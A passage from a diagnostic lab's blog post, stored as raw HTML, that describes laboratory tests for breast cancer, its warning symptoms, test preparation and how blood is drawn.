Occurring primarily in the ducts that transport milk to the nipple during lactation (breast feeding), and secondarily in the lobules the glands that produce milk, breast cancers are distinct from cancers that may spread to the breasts from other parts of the body. Laboratory <strong><a href=\"https:\/\/www.lalpathlabs.com\/test-for-breast-cancer\" target=\"_blank\" rel=\"noopener\">tests for Breast Cancer<\/a><\/strong> can be broken down into groups, based on the purpose of<br \/>\ntesting:<\/p>\n<p><!--more--><\/p>\n<ul>\n<li style=\"text-align: justify;\">To diagnose: cytology \u2010 a microscopic examination of tumor cells obtained through fine<br \/>\nneedle aspiration and surgical pathology \u2010 a microscopic examination of tissue sampling<br \/>\nvia biopsy<\/li>\n<li style=\"text-align: justify;\">To determine treatment options: evaluation of the tumor&#8217;s HER\u20102\/ neu gene<br \/>\namplification status and estrogen and progesterone receptor status<\/li>\n<li style=\"text-align: justify;\">To monitor treatment and for recurrence: measurement of CA 15\u20103 or CA 27.29 in the<br \/>\nblood<\/li>\n<\/ul>\n<p style=\"text-align: center;\"><a href=\"https:\/\/youtu.be\/jOSCsVFHHdE\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-full wp-image-4257\" src=\"https:\/\/www.lalpathlabs.com\/blog\/wp-content\/uploads\/2015\/08\/GEN_UTUBE_THUMB.jpg\" alt=\"\" width=\"600\" height=\"338\" \/><\/a><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong>Why Is It Done?<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">It is important to remember that most lumps found in the breast are not cancerous but are<br \/>\nbenign and that the symptoms and signs associated with breast cancer may be due to other<br \/>\ncauses. So to clear all doubts regarding <strong><a href=\"http:\/\/www.lalpathlabs.com\/blog\/breast-cancer\/\">Breast Cancer<\/a><\/strong> one should undergo these tests. You<br \/>\nshould undergo diagnostic tests for breast cancer if any of the following symptoms come up:<\/p>\n<ul>\n<li style=\"text-align: justify;\">Mass or lump in the breast<\/li>\n<li style=\"text-align: justify;\">Breast skin dimpling, reddening, or thickening<\/li>\n<li style=\"text-align: justify;\">Nipple retraction<\/li>\n<li style=\"text-align: justify;\">Breast swelling or pain<\/li>\n<li style=\"text-align: justify;\">Nipple pain and\/or discharge<\/li>\n<li style=\"text-align: justify;\">Swelling or lumps in adjacent underarm lymph node.<\/li>\n<\/ul>\n<p><span style=\"color: #000000;\"><strong>How to Prepare?<\/strong><\/span><\/p>\n<p>Some tests for breast cancer are performed on the patient\u2019s blood; others are done on a<br \/>\nsample of cells or the tumour tissue.<br \/>\nFor Blood Test: There is no special preparation required for <strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https:\/\/www.lalpathlabs.com\/\">blood test<\/a><\/span>.<\/strong><br \/>\nFor Tissue Test: Your doctor needs to extract the affected tissue so you need to send the same<br \/>\nfor testing in the pathology lab.<\/p>\n<p><span style=\"color: #000000;\"><strong>How it is done?<\/strong><\/span><\/p>\n<p>Blood Test:<br \/>\nThe health professional (phlebotomist) drawing blood will:<\/p>\n<ul>\n<li>Wrap an elastic band (tourniquet) around your upper arm to stop the flow of\u00a0blood. This makes the veins below the band larger so it is easier to put a needle\u00a0into the vein.<\/li>\n<li>Clean the needle site with alcohol.<\/li>\n<li>Put the needle into the vein. More than one needle stick may be needed.
